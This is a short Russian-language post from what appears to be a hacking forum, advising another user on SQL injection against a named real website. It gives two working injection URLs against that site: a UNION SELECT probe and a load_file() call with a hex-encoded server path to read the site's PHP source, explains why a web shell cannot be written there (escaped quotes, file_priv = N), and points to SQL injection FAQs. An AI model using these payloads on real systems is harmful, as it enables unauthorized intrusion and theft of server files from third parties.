02.09.2009, 16:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
В твоем случае не зальёшь.
1. Кавычки экранируется, о чем сообщает ошибка
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+'hello'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gener123/domains/tipik.ru/public_html/outtop.php on line 12
2. file_priv = N
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+load_file(0x2F686F6D652F67656E65723132332F646F6D61696E732F746970696B2E72752F7075626C69635F68746D6C2F6F7574746F702E706870)
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Я еще ни разу не видел маны по скулям, где описана конкретная версия БД. ЗЫ: В 4й и 5й ветке шеллы льются одинаково. Читай:
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
От себя рекомендую (сам по этой статье учился):
SQL injection полный FAQ |
|
|